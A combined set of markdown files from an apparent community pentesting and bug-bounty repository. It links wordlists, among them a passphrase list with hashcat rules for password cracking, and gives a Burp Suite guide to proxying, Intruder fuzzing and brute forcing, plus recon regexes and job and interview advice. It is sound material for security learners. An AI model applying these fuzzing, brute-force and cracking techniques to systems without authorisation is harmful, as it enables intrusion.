▫️ | [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
▫️ | [OneListForAll](https://github.com/six2dez/OneListForAll)
Index | wordlists
-- | --
**0** Creating Wordlists for Hacking, Pentesting & Bug Bounty Hunting | [Using Seclists, Bigquery, and More!](https://www.youtube.com/watch?v=QGbTaxtEQlg)
**1** | [login-panel-wordlist](https://github.com/basubanakar/login-panel-wordlist)
**2** Brutas-Wordlists and passwords handcrafted with ♥️| [A pretty comprehensive set of password dictionaries and wordlists designed for quick wins in red teaming scenarios or general blackbox pentesting.](https://github.com/tasooshi/brutas)
**3** COOK | [An overpower wordlist generator, splitter, merger, finder, saver, create words permutation and combinations, apply different encoding/decoding and everything you need.](https://github.com/giteshnxtlvl/cook)
**4** Scavenger | [Burp extension to create target specific and tailored wordlist from #burp history.](https://github.com/0xDexter0us/Scavenger
**5** Passphrase-wordlist | [People think they are getting smarter by using passphrases. Let's prove them wrong!
This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1,000 permutations of each phase](https://github.com/initstring/passphrase-wordlist)
**6** Webapp Wordlists | [This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.](https://github.com/p0dalirius/webapp-wordlists)
**7** OneListForAll | [This is a projectt to generate huge wordlists for web fuzzing, if you just want to fuzz with a good wordlist use the file onelistforallmicro.txt.](https://github.com/six2dez/OneListForAll)
**8** skweez | [skweez (pronounced like "squeeze") spiders web pages and extracts words for #wordlist generation.](https://github.com/edermi/skweez)
================================================
FILE: Bugbounty/bugbounty-FAQ.md
================================================
# BUG BOUNTY FAQ - freqently asked questions (Beginners friendly - Under Development)
Note: Contents inside the **RESETHACKER Community** are to help our community members and content belongs to respective Authors and RESETHACKER Team.
BugBounty FAQ | Title
-- | --
**0** Getting Started in Cybersecurity Advice | [Be-a-hacker and breaking cybersecurity successfully](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Getting_Started_with_Cybersecurity.md)
**0** Domain Information - ResetHacker | [Acquisition, Get IP, Check ASN, check CIDR range, WHOIS, Reverse Whois, DNS Information etc.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/BB-FAQ/Domain-Information.md)
**0** Bugbounty FAQ - Imran parray | [General questions asked by poeple](https://github.com/imran-parray/General-Notes)
**0** Bugbounty Setup HelpDesk | [Got stuck During Setup We have solution for you](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup)
**0** Job/Internship/Resume HelpDesk | [find Cybersecurity Jobs/interview, advice to get jobs, crack interview etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)
**0** Stay upto date with conferances | [Track all the upcoming conferances](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)
**0** Trace latest reward, CVE, writeups, tools, Reports, Disclosures and on going trend in Community | [Weekly Newsletter to keep up with infosec community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty)
**0** Build with community | [Create, Build and Automate for personal use ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/Create.md)
================================================
FILE: Bugbounty/burpsuite.md
================================================
# Burp Suite for Pentester
Index | title
-- | --
**0**. [Burpsuite - Getting Started, configure, recon setup and understnding popular features](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/Readme.md)
**1**. [ProTips for Burpsuite - More updates comming Soon](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/protips.md)
**2**. [Writing your Own Burpsuite Extensions - Updating Soon](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/Readme.md)
------------------------------------------------------------------------------------------------------------
# Burp Suite cheatsheet to hunt the vulnerabilities
Credit : [Ignitetechnologies](https://github.com/Ignitetechnologies/BurpSuite-For-Pentester)
This cheatsheet is built for the Bug Bounty Hunters and Penetration Testers in order to help them to hunt the vulnerabilities from P4 to P1 solely and completely with "BurpSuite". It is designed such that the beginners can understand the fundamentals and the professionals can brush up their skills with the advanced options. There are multiple ways to perform all the mentioned tasks, thereby we've performed and compiled this list over with our experience. Please share it with your connections and send your queries and feedbacks directly to [Hacking Articles](https://twitter.com/hackinarticles).
1. [Burp Suite for Pentester: Web Scanner & Crawler](https://www.hackingarticles.in/burp-suite-for-pentester-web-scanner-crawler/)
2. [Burp Suite for Pentester – Fuzzing with Intruder (Part3)](https://www.hackingarticles.in/burp-suite-for-pentester-fuzzing-with-intruder-part-3/)
3. [Burp Suite for Pentester – Fuzzing with Intruder (Part2)](https://www.hackingarticles.in/burpsuite-for-pentester-fuzzing-with-intruder-part-2/)
4. [Burp Suite for Pentester – Fuzzing with Intruder (Part1)](https://www.hackingarticles.in/burp-suite-for-pentester-fuzzing-with-intruder-part-1//)
5. [Burp Suite for Pentester – XSS Validator](https://www.hackingarticles.in/burp-suite-for-pentester-xss-validator/)
6. [Burp Suite for Pentester – Configuring Proxy](https://www.hackingarticles.in/burp-suite-for-pentester-configuring-proxy/)
7. [Burp Suite for Pentester: Burp Collaborator](https://www.hackingarticles.in/burp-suite-for-pentester-burp-collaborator/)
8. [Burp Suite For Pentester: HackBar](https://www.hackingarticles.in/burp-suite-for-pentester-hackbar/)
9. [Burp Suite for Pentester: Burp Sequencer](https://www.hackingarticles.in/burp-suite-for-pentester-burp-sequencer/)
10. [Burp Suite for Pentester: Turbo Intruder](https://www.hackingarticles.in/burp-suite-for-pentester-turbo-intruder/)
11. [Engagement Tools Tutorial in Burp suite](https://www.hackingarticles.in/engagement-tools-tutorial-burp-suite/)
12. [Payload Processing Rule in Burp suite (Part2)](https://www.hackingarticles.in/payload-processing-rule-burp-suite-part-2/)
13. [Payload Processing Rule in Burp suite (Part1)](https://www.hackingarticles.in/payload-processing-rule-burp-suite-part-1/)
14. [Beginners Guide to Burpsuite Payloads (Part2)](https://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-2/)
15. [Beginners Guide to Burpsuite Payloads (Part1)](https://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-1/)
16. [Burpsuite Encoder & Decoder Tutorial](https://www.hackingarticles.in/burpsuite-encoder-decoder-tutorial/)
17. [Burp Suite for Pentester: Active Scan++](https://www.hackingarticles.in/burp-suite-for-pentester-active-scan/)
18. [Burp Suite for Pentester: Software Vulnerability Scanner](https://www.hackingarticles.in/burp-suite-for-pentester-software-vulnerability-scanner/)
19. [Burp Suite for Pentester: Burp’s Project Management](https://www.hackingarticles.in/burp-suite-for-pentester-burps-project-management/)
20. [Burp Suite for Pentester: Repeater](https://www.hackingarticles.in/burp-suite-for-pentester-repeater/)
================================================
FILE: Burpsuite/Assets/Readme.md
================================================
================================================
FILE: Burpsuite/Readme.md
================================================
Credit: Vikram -team ResetHacker
**Q: What is Burp and why is it important for penetration testing?**
Web application penetration testing tool developed in JAVA also know as "Interception Proxy" tool because allows you to inspect, modify, replay, etc to web requests.
It has a vast amount of plugins to aid in the identification and exploitation of bugs but its real power comes from allowing attackers the ability to inspect and manipulate raw HTTP requests.
**Enterprise - Professional - Community**
Burp Suite - basic features such as proxy, repeater, intruder, decoder, comparer etc.
BurpSuite - Advance features such as Extender, scanner, sequencer, collaborator, infiltrator etc
### Download and run
* Download [Burp Suite](https://portswigger.net/burp/communitydownload)
* Run in terminal
```
To run Burp, you will need Java version 11 to 17.
java -version
java -jar -Xmx4g /path/to/burp.jar
```
**Burp-Proxy-Setup**
The proxy tab is probably the most important tab in Burp. This is where you can see all of your traffic that passes by the Burp proxy.
○ To check Proxy is listening in burp :
Open BurpSuite > Proxy > options > Running (Ticked)
○ Force your browser to route its traffic through the Burp proxy:
Browsers setting > Network setting - connection setting - Manual Proxy Configuration
(IP: 127.0.0.1 and Port : 8080)
○ Imported the Burp certificate in your browser:
Type https://burp in browser and download the certificate.
Settings > Import the CA certificate > tick all the option & save it.
**Note that,**
○ Normally people turn “intercept” to off ( to avoid manually forward for each request ) and rather view the traffic in the “HTTP History” tab. only turn “intercept” to on when trying to isolate requests from a specific feature.
○ HTTP History is where people spend 80% of my time looking for something that peaks my interest. When looking at the traffic I'm mostly paying attention to the method,url, and MIME type fields. Why?
○ Because when I see a POST method being used I think of Stored XSS, Cross site request forgery, and many more vulnerabilities. When I see a URL with an email, username,or id in it I think IDOR. When I see a JSON MIME type I think back-end API. Most of this knowledge of knowing what to look for comes with experience.
○ One functionality that people use to find a lot of vulnerabilities and make my life easier is the search feature. Basically you can search for a word(s) across all of your Burp traffic.
For example I may search for the word “url=” this should show me all requests which have the parameter URL in it, I can then test for Server Side Request Forgery (SSRF) or open redirect vulnerabilities. I might also search for the header “Access-Control-Allow-Origin” or the“callback=” GET parameter when testing for Same Origin Policy (SOP) bypasses.
**[Jason Heddix- To LINK target discovery w/ Burp Suite:](https://twitter.com/jhaddix/status/972926512595746816?lang=en)
1) Turn off passive scanning
2) Set forms auto to submit
3) Set scope to advanced control and use string of target name (not a normal FQDN)
4) Walk+browse, then spider all hosts recursively!
5) Profit (more targets)!
**Export subdmains from file to Burp suite**
Export subdmains from file to Burp suite by [@tvmpt](https://twitter.com/tvmpt)
```cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s```
# Recon with BurpSuite
**Credit : https://github.com/ghsec/webHunt/**
### Set scope
* Scope --> Use advansed scope control --> Add --> host or IP range == target
### Spidering
* Select all host in sitemap and Spider.
* Do it again and again if new hosts are noticed.
### Recon for new Subdomains
* Collect new subdimains which is not detected by spider. in request | response body.
```
(http[s]?:\/\/)?((-)?[\w+\.]){1,20}domain\.com
```
Note: click + button and check regex && Auto-scroll to match when text changes
### Extract endpoints from js file
note: regex taken from Linkfinder by GerbenJavado
```
(?:"|')(((?:[a-zA-Z]{1,10}://|//)[^"'/]{1,}\.[a-zA-Z]{2,}[^"']{0,})|((?:/|\.\./|\./)[^"'><,;| *()(%%$^/\\\[\]][^"'><,;|()]{1,})|([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}\.(?:[a-zA-Z]{1,4}|action)(?:[\?|/][^"|']{0,}|))|([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^"|^']{0,}|)))(?:"|')
```
### Internal | External IP address
```
\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b
```
-------------------------------------------------------------------------------------------------------------------------------
Credit: Vikram -team ResetHacker
**2.Target -> SITEMAP**
○ Sitemap becomes fairly useful when hitting an undocumented API endpoint as this view allows you to build a picture of the possible endpoints. You can also view the HTTP requests in this tab, clicking on a folder in the sitemap will only show requests from that path.
**3.Intruder:**
○ If you're doing any fuzzing or brute forcing with Burp you're probably doing it in the “intruder” tab. When you find an interesting request right click it then click “Send to Intruder”
Goto "Intruder" > Click "Clear"> Now from here your steps vary depending on what you're trying to do,
Eg: we are trying to do some parameter fuzzing. One of the first things we need to do is select the value we are trying to modify. This can be done by highlighting the value and pressing the “Add” button. Since we are attempting to do parameter fuzzing this is the value that will be replaced with our fuzzing payloads.
You may have also noticed the “Attack type” drop down menu is set to “Sniper”, there are four different attack types which are described in the table below:
i. Sniper Uses a single payload list; Replaces one position at a time;
ii. Battering ram Uses a single payload list; Replaces all positions at the same time; Once you have selected your attack type and the value to be modified click on the “Payloads” sub tab as shown below:
iii. Pitchfork Each position has a corresponding payload list; So if there are two positions to be modified they each get their own payload list.
iv. Cluster Bomb Uses each payload list and tires different combinations for each position.
Once you have selected your attack type and the value to be modified click on the “Payloads” sub tab.Here we want to select our payload type and the payload list.
As for my payload list we want a list of fuzzing values. For this example im just going to use the default lists that comes with Burp but there are some other good lists on SecLists:
● https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
Now to use Burps pre defined list just click the “Add from list” drop down menu and select one.
Now that you have your fuzzing list imported all that you have to do is press “Start attack”.
The next step is to inspect the HTTP responses to determine if there is anything suspicious. However, most professionals don't use intruder, they use a plugin called “Turbo Intruder”
**4.Repeater:**
○ Repeater modify and replay and request you do it in the repeater tab. the request to test for vulnerabilities and security misconfigurations.
You might have noticed that at the top there are a bunch of different tabs with numbers on them. By default every request you send to the repeater will be assigned a number. Whenever I find something interesting I change this value so I can easily find it later, that's why one of the tabs is labeled SSRF,it’s a quick easy way to keep a record of things.
**5.Burp Collaborator:**
○ A network service which helps to discover blind vulnerabilities such as SQL injection, XML injection, cross-site scripting, code enjection etc
**6.Burp Recommended Extensions:**
Burp Extender lets you enhance Burp's functionality by installing extensions created by the community, or even writing your own.
BurpSuite > Extender > BApp Store
Burp extensions can customize and extend Burp Suite's behavior in numerous ways. Few recommended tools are
================================================
FILE: Burpsuite/protips.md
================================================
# Pro Tips for Bupsuite
[Author b1twis3](http://b1twis3.ca/burpsuite-30-pro-tips/) | #BurpSuiteTips
## Sample :
**[1/30](https://twitter.com/fasthm00/status/1228118057144537088)** |
Instead of using many tools to do multiple level of encoding or string manipulation.
You can do all of that and MORE using #Hackvertor extension by @garethheyes in just a couple of clicks!]
**[2/30](https://twitter.com/fasthm00/status/1228544097679527937)** |
#SleepyPuppy is one of the blind XSS management frameworks by @netflix that integrates with BurpSuite.
- Manage Assessments and Payloads (Burp or SP)
- Integration with Repeater and Intruder
- Logs and Statistics
- Active Scan
- Multiple Users
**[3/30](pic.twitter.com/G1FYXLV8WC)** |
Applying session handling & macro to a 3rd party tool (Sqlmap) and excluding a cookie value from the altering.
Note that I just used the profile endpoint and the /login RESTful api for testing purposes.
**[4/30](https://t.co/oAtqGgubEu)(pic.twitter.com/xapBjWNwAa)** |
Deploying Private BurpSuite Collaborator in AWS EC2 Instance (Automated).
You could use the AWS console to do it manually as well! Note that this is the basic implementation of the server.
**[5/30](pic.twitter.com/s7LwoPGGk2)** |
Creating sequences of requests/steps using BurpSuite extension #Stepper.
Another #Tip:
No need to be an expert in #RegEx to use Stepper, just use BurpSuite Sequencer (Select! Then copy the RegEx)
BUT it's good to know RegEx ofc!
**[6/30](pic.twitter.com/3t6ECg0W6U)** |
A short but valuable tip when it comes to automation!
Generating scripts such as Python, cURL, PowerShell and other scripting languages to reissue a selected HTTP request.
**[7/30](https://t.co/qYA50Ffw1H)** |
Now you can match responses based on specific conditions and push the matched strings/body to your slack/custom server.
– Customize the push notification
– Timer
– Match all the callbacks.
================================================
FILE: CONTRIBUTING.md
================================================
# Contribution Guidelines
Please note that this project is released with a [Contributor Code of Conduct](code-of-conduct.md). By participating in this project you agree to abide by its terms.
## Submitting a pull request
If you like to contribute to an Resethacker community repository, this is how you do it.
<br>
- Fork this repository
- Clone this repository
- Add or Make the changes
- Wait for your pull request to be reviewed and merged!
## Updating your Pull Request
Sometimes, a maintainer of an ResetHacker community will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the ResetHacker guidelines.
================================================
FILE: Contributors.md
================================================
# Contributors
We are very grateful to the following people have contributed to this project.
================================================
FILE: CyberSecurityJobs/Careers
================================================
1. | [cyber-security-careers/](https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/)
# Security Operation Operation(SOC L1 & L2 Team)
SUMMERY:
What happens if antivirus get triggered, firewall configuration got triggered, Some malware are sending the date to an outside server(Dashboard),
1. Monitor and analyse for malicious activity (By opening Event Viewers in a windows machine.
Security analysis receiving data log from each machine or search species log/failure analysis it and creates a report that's why we call ourself Security Analysis or L 1 team)
2: Project review
3: USE TOOLS Spunk (S.I.E.M)
4: Incient Response
5: general cve & latest Vulnerability update
##Roles and responsibilities of an entry-level SOC Analyst
• Perform threat analysis
• Monitor network for malicious activity
• Perform risk analysis, security assessments, and vulnerability testing
• Maintain log analysis
• Application/ mobile security
• Vulnerability scanning in software and hardware
• Coordinate with other analysts and departments for network security
• Investigate, document, and report all security issues
• Implement and maintain security protocols
• Involved in security audits – internal and external
• Anticipate threats and alerts to avoid their occurrence
• Coordinate with vendors on security plans
• Analyse breaches to determine their root cause
From <https://blog.eccouncil.org/become-a-soc-analyst-job-role-expectation-and-salary/?_ga=2.146323316.1731529884.1632004544-1782675224.1632004544>
Pre-requisite to get into SOC Level 1 –
From <https://blog.eccouncil.org/become-a-soc-analyst-job-role-expectation-and-salary/?_ga=2.146323316.1731529884.1632004544-1782675224.1632004544>
##COURSE: Security Operations Center | Certified SOC Analyst | CSA | EC-Council (eccouncil.org)
1. Security Operations and Management
2. Understanding Cyber Threats, IoCs, and Attack Methodology
3. Incidents, Events, and Logging
4. Incident Detection with Security Information and Event Management (SIEM}
5. Enhanced Incident Detection with Threat Intelligence
6. Incident Response
Interviews Questions:
What is SOC and security analyst.
DATA leak & high level steps in DATA loss preventions
Phishing,Vishing & prevention
Explain DNS works
Some example of Web server vulnerabilty & how to prevent them.
Protect themselves from SQL Injection
Port number populer one & why remove certain ports {80,22, 443 58 etc and understanding of each ports}
Hashing & Encryption
Some Security vulnerabilty in 2021 & 2020
Explain HTTPS & SSL
================================================
FILE: CyberSecurityJobs/CoverLetter.md
================================================
# Cover letter tips for Cybersecurity Jobs :
1. Highlight your experience
2. Show your passion for the job and talk about projects (if any).
3. Lean and modify Your resume based on job description.
4. Recheck and know your cover letter and resume.
*___________________(eg Penetration Tester,security analist etc) Cover Letter Example 1*
I am excited to be applying for the ___________________ position at Topdown Security. I have more than five years of experience in the information security field and have been working as a ___________________ for the past two years. I am confident that I have the skills and experience that you are looking for in this role.
I am motivated by the challenge of finding and exploiting vulnerabilities in systems and enjoy the satisfaction of helping an organization improve their security posture. I have a strong technical background and am proficient in a variety of security assessment tools and techniques. I am also experienced in working with clients and have a proven track record of delivering quality results on time and within budget.
I am committed to continuing to grow as a ___________________ and am excited about the opportunity to join Topdown Security and learn from the best in the industry. I believe that my skills and experience would be a valuable addition to your team, and I look forward to discussing this opportunity further with you.
*___________________(eg Penetration Tester,security analist etc) Cover Letter Example 2*
I am writing in regards to the ___________________ opening that I saw on your website. I am confident that I have the skills and qualifications that you are looking for.
For the past three years, I have been working as a ___________________. In that time, I have performed hundreds of tests, successfully identifying vulnerabilities in systems. I have also been responsible for developing and implementing security measures to protect systems from future attacks.
My skills go beyond just identifying vulnerabilities. I am also an expert in penetration testing tools and techniques. I am able to quickly and efficiently find and exploit security holes in systems.
I am confident that I can be a valuable asset to your company. I am a hard worker who is always willing to go the extra mile. I am also a team player who is able to work well with others.
Please contact me to discuss any questions you may have. I look forward to hearing from you.
Sincerely,
Your name
*___________________(eg Penetration Tester,security analist, Network Administrator etc) Cover Letter Example 3*
I am writing to express my interest in the ___________________ position that you have posted. I believe that I would be a great fit for this position as I have extensive experience in the field of ___________________ and security assessment.
I have been working in the IT industry for over 10 years, with most of my experience being in the field of information security. I have worked on many projects ranging from small business security assessments to enterprise-level network security assessments. I have also worked on several ___________________ engagements, including vulnerability assessments, source code reviews, and wireless assessments.
My background includes working as a ___________________(eg Penetration Tester, Security Analyst, and Network Administrator). My core competencies include performing vulnerability assessments, penetration testing, and security assessments. I am also skilled in the use of various security tools such as Nessus, Metasploit, Wireshark, and Netcat.
I am confident that my skills and experience will make me an asset to your organization. I look forward to hearing from you soon.
Source : https://climbtheladder.com/penetration-tester-cover-letter/
================================================
FILE: CyberSecurityJobs/CybersecuityDiscipline.md
================================================
After Reading this I hope this will help you in understanding which disciplines best fit your abilities, experience, and interests in cybersecurity career.
Reference from Cybersecurity Career Guide - By Alyssa Miller
Note : Each of these disciplines,depicted in figure 2.1, categorizes numerous job roles that are constantly evolving and changing.
Security operations (SOC TEAM)
Digital forensics and incident response (DFIR)
Security architecture and design
Security assessment and verification (Vulnerability assisments, pentesting red teaming etc)
Application, software, and product security
Governance and compliance
Education and awareness
Sales and sales support
Leaders and executives
**Security operations**(people on the cybersecurity front lines):
The skill sets of these people tend to be wide ranging as they’re ultimately responsible for maintaining security
posture across all technologies within an organization. The responsibilities within security operations therefore are
wide reaching. At the core of security operations is typically the security operations center (SOC).
The function of the security operations center (SOC) is to monitor, prevent, detect, investigate, and respond to
cyber threats around the clock. SOC teams are also charged with monitoring and protecting the organization's assets including
intellectual property, personnel data, business systems,and brand integrity.
The security operations role also interfaces with many of the other roles that we will discuss. For instance,
when an alerted event turns out to be an attack, they may need to engage the incident response team to provide
a more sophisticated response to the problem (more on that soon). They also need to be aware of the current threat landscape,
because receiving regular information from threat intelligence resources is crucial.
Advice:
For many who are looking to begin a career in cybersecurity,Security operations is where they start. Security operations
roles often work with automated systems and repeatable tasks that lend themselves well to on-the-job learning and training.
Additionally, individuals in these roles can easily leverage previous IT experience in their daily job functions.
Finally, because of the nature of the role and the wide-ranging responsibilities over various forms of technology,
security operations is a terrific way to gain exposure to a lot of the technologies and concepts that the cybersecuirty
teams are charged with defending.
**Digital forensics and incident response (DIFR)** that focuses on the identification, investigation, and remediation of cyberattacks.
DFIR has two main components:
Digital Forensics: A subset of forensic science that examines system data, user activity, and other pieces of digital evidence
to determine if an attack is in progress and who may be behind the activity.
Incident Response: The overarching process that an organization will follow in order to prepare for, detect, contain, and recover from a data breach.
Whereas the SOC is responsible for evaluating potential incoming attacks and taking initial steps to defend against
them, they will typically escalate to incident response(IR) personnel if a more coordinated and specialized level of
response is needed or if the breadth of the attack involves extensive portions of the environment.
================================================
FILE: CyberSecurityJobs/For_Jobs.md
================================================
**For Job** :
- 1. Understand domain & choose your Goal.
- 2. Find your Mentor.
- 3. Validate your Career and Goal with Mentor.
- 4. Complete the course(Free/paid) to intensify learning
- 5. Build a Project, Resume & Cover letter.
- 6. Attend 2 Mock - 1 with Community & 1 interview with your Mentor.
- 7. Apply & Get a Job.
Simplified steps to get a Job.
If anyone like to comment their point of view or like to add something most welcome :)
Note : When i say project it does mean building something in cybersecurity that actual solve the problem such as Attack surface management project or bug bounty tool or automate your workflow etc and not keylogger.
By offensive Security :
- 🔴Build a Strong Resume
➡Resume Now: https://resume-now.com/build-resume
➡Novoresume: https://novoresume.com
➡Information Technology resume examples: https://www.jobhero.com/resume/examples/information-technology
- 🔵Interview Prep
➡Tell Me About Yourself: https://youtube.com/watch?v=TQHW7gGjrCQ
➡35 Pentesting Interview Questions (With Sample Answers): https://indeed.com/career-advice/interviewing/pentesting-interview-questions
➡200 IT Security Job Interview Questions via McAfee: https://www.mcafee.com/enterprise/en-us/assets/misc/ms-200-it-security-interview-questions.pdf
- 🟣 YouTube Channels
➡OffSec Live | How to Write a Cybersecurity Resume: https://youtube.com/watch?v=zZSiml6vGO0
➡Resume reviews with Neal Bridges:https://youtube.com/watch?v=wejL0ll__uQ&list=PLqEPHR4iX_BJRT6qDSSNy2sWgbaPlxx1p
➡Infosec Job Hunting with Jason Blanchard: https://youtube.com/playlist?app=d
---
2. Find a Mentor :
- Stage 1 : Invite Based & selected Mentors only.
- Stage 2 : Search You're mentor on platform.
- 3. Validated your Career and Goal with Mentor.
**Mentor Questions** :
If Cadidate is Ready:
- May i know what role do you apply for ?
- How do you prepare for the interview ?
- Wait i'll share you something that will help you.
- And when you're ready with interview questions then let know I'll arrange a Mock interview Test before the actual Interview so you can be prepare and be confident for an interview.
If Cadidate is not ready:
- Can you introduce yourself and tell me about achivements ?
- May i know the Couse that you have completed or get certified ?
- 4. Complete the course(Free/paid) to intensify learning.
- 5. Build a Project, Resume & Cover letter.
Happy to help and take care of yourself.
---
- 6. Attend 1 Mock interview with your Mentor.
- Review the Assigned task from last talk "Validate from Mentor".
- Rate the candidate, give a remark & Move forward with Mock Interview:
- Complete the Mock Interview, give a Remark & Suggestion where to apply etc.
---
Congratulation you're ready for a Job.:)
=========
# Breaking into cybersecurity:
- These videos / guides will help you to smash your next interview!
Top 30 Penetration Tester Interview Questions / Answers
https://lnkd.in/eAkvQFZG
Cyber Security Interview Prep
https://lnkd.in/eky9v_hC
SOC Analyst Interview Questions (LetsDefend)
https://lnkd.in/eqFPGS-Z
GRC Entry-Level Interview Q&A (👉🏼 Gerald Auger, Ph.D.)
https://lnkd.in/eK6uti-W
Mastering the Art of the Interview (TEDX Talks / Ashley Rizzotto, M.Ed.)
https://lnkd.in/ecMGM5Tn
Tell Me About Yourself - A Good Answer To This Question
https://lnkd.in/eES-wF7Q
How to Ace a Job Interview: 10 Crucial Tips
https://lnkd.in/e29vxaH9
Cybersecurity Interview Preparation Playlist (👉 Jon Good 👈)
https://lnkd.in/ek-x4cPx
How To Be Confident In Interviews
https://lnkd.in/eGQgXbKJ
How To Crush Any Interview
https://lnkd.in/eWr2mU57
10 Best Questions to Ask an Interviewer
https://lnkd.in/efMbFn4S
How to Ace Your Job Interview (David Bombal)
https://lnkd.in/eKyqWpCU
Cybersecurity Practice Interview Questions Playlist (Josh Madakor)
https://lnkd.in/eqw-Z-tD
How to Prepare for a Cyber Security Interview (Cyberspatial)
https://lnkd.in/eTzegN6G
How to Fail a Cybersecurity Interview (Cyberspatial)
https://lnkd.in/eu_KyAf2
================================================
FILE: CyberSecurityJobs/Intership_Advice.md
================================================
## 1. Internship
[Advise by iamthefrogy](https://github.com/iamthefrogy)
Shall I go for an internship in any company after my study?
Will it be helpful in my career?
What kind of internship do companies provide?
Is it necessary to do it from a renowned company or any company?
The answer to this question is too broad. It depends on many factors such as:
• Which company is providing Internship (Product based company, security consulting company, Big4 etc.?)
• What are their requirements for internship programs?
• What will be the job roles and responsibilities during the internship?
• What are the expectations from an employer?
There are very few; I would say only a handful of companies that provide quality internships where you would learn valuable things.
Most of the money-making companies are running CEH (Certified ethical hacker – Which is the official certification from EC-Council, a well-reputed cybersecurity certification authority) and related courses on the name of an internship.
For example, if my company's name is Prakash, then I will provide my own CEH certification in the name of "PCEH – Prakash Certified Ethical Hacker" and so on.
- So, I have prepared 'DO' and 'DON'T' for selecting a company for your internship
## DO
• Understand the nature of a company (consulting, product-based, small, big, etc.).
• Ask them about your daily responsibilities, tasks, and job routines.
• Ask them what the learning options are they can provide to you during your internship.
• Ask them what their expectations from you during the duration of the internship will be.
• Ask more and more people around for the reviews of those companies you are evaluating for internships.
• Identify your career interests. This could be done by self-reflection, speaking with a Career Counsellor or your mentor
• Ask the company about paid or unpaid Internships. You can go for any as far as other criteria are matched.
• Start searching for an internship at least 6 months prior.
• If you are interested in any company and can't find any internship opportunity, you can check their website and social media. Connect to their HRs via
• LinkedIn and ask the same.
• Better understand and research who they are, what they do, their strengths and weaknesses
• Perform at least 5 mock interviews with your career counsellor or mentor before going for an internship interview.
## DON'T
• Don't select a company that just provides course teaching, coaching.
• Don't select a company that do not serve any clients or serve any handful of clients only with simple projects.
• Don't select a company that asks you to teach their students via their coaching, training programs.
• Don't get attracted by any company's marketing & PR success.
• Don't get attracted by their company's reputation through magazines, press, awards from random conferences or panels.
• Don't select a company where only 4/5 people are working; all are Founders, Co-Founders, Directors. If you do, please check their professional
• background. Check whether they obtained these titles without having any prior corporate experience or started their start-ups after having at least 8
years of experience in the industry
================================================
FILE: CyberSecurityJobs/InterviewQA.md
================================================
0. All for one - interview questions - https://drive.google.com/drive/folders/17Brt0bx__E5Dd7PeR_09wPylidpDFZ7M?usp=sharing
1. [83 Basics Hacking Question Answers](https://www.besanttechnologies.com/ethical-hacking-interview-questions-and-answers#)
2. [SOC Analyst (Cybersecurity) Interview Questions and Answers - Udemy Anand Guru]()
3. [60 Cybersecurity Interview Questions](https://danielmiessler.com/study/infosec_interview_questions/)
4. [Security Engineer Interview Questions](https://github.com/tadwhitaker/Security_Engineer_Interview_Questions/blob/master/security-interview-questions.md)
5. [Security Engineer Interview Questions](https://gist.github.com/boodera/f216ac8c0ca6eb291e09b2e3cf19b3fd)
6. [Security Engineer Interview Questions, Quiz etc](https://github.com/justinltodd/security-interview-questions)
7. [Security Engineer Interview Tips](https://github.com/jigerjain/Interview_Tips)
8. [Infosec interview Questions](https://github.com/pbnj/infosec-interview-questions)
9. [Security Engineer Interview Questions and Engineering interview questions](https://github.com/paulveillard/cybersecurity-interview-questions#security)
10. [Top 50 Interview Questions & Answers | Penetration Testing - Updated 2022](https://allabouttesting.org/interview-questions-answers-penetration-testing/)
11. [Penetration Testing Interview Questions Cheat Sheet](https://allabouttesting.org/interview-questions-answers-penetration-testing/)
12. [*Penetration Testing Interview Questions Cheat Sheet by Stefano Lanaro](https://steflan-security.com/penetration-testing-interview-questions-cheat-sheet/)
13. [🧵Resources for a Successful #Cybersecurity Job Hunt🧵 by Offensive Security]
- 🔴Build a Strong Resume
➡Resume Now: https://resume-now.com/build-resume
➡Novoresume: https://novoresume.com
➡Information Technology resume examples: https://www.jobhero.com/resume/examples/information-technology
- 🔵Interview Prep
➡Tell Me About Yourself: https://youtube.com/watch?v=TQHW7gGjrCQ
➡35 Pentesting Interview Questions (With Sample Answers): https://indeed.com/career-advice/interviewing/pentesting-interview-questions
➡200 IT Security Job Interview Questions via McAfee: https://www.mcafee.com/enterprise/en-us/assets/misc/ms-200-it-security-interview-questions.pdf
- 🟣 YouTube Channels
➡OffSec Live | How to Write a Cybersecurity Resume: https://youtube.com/watch?v=zZSiml6vGO0
➡Resume reviews with Neal Bridges:https://youtube.com/watch?v=wejL0ll__uQ&list=PLqEPHR4iX_BJRT6qDSSNy2sWgbaPlxx1p
➡Infosec Job Hunting with Jason Blanchard: https://youtube.com/playlist?app=d
================================================
FILE: CyberSecurityJobs/Jobs.md
================================================
## Table of Contents for Jobs
- [0. Weekly_Cybersecurity Hiring](#0-weekly-cybersecurity-hiring-october-2022)
- [1. Types of Company](#1-types-of-company)
- [2. Types of High Paying Jobs & responsiblities](#Types-of-High-Paying-Jobs-&-responsiblities)
- [3. IT COMPANY offer Jobs](#IT-COMPANY-offer-Jobs)
- [4. Cybersecurity jobs at Startups](##Cybersecurity-jobs-at-Startups)
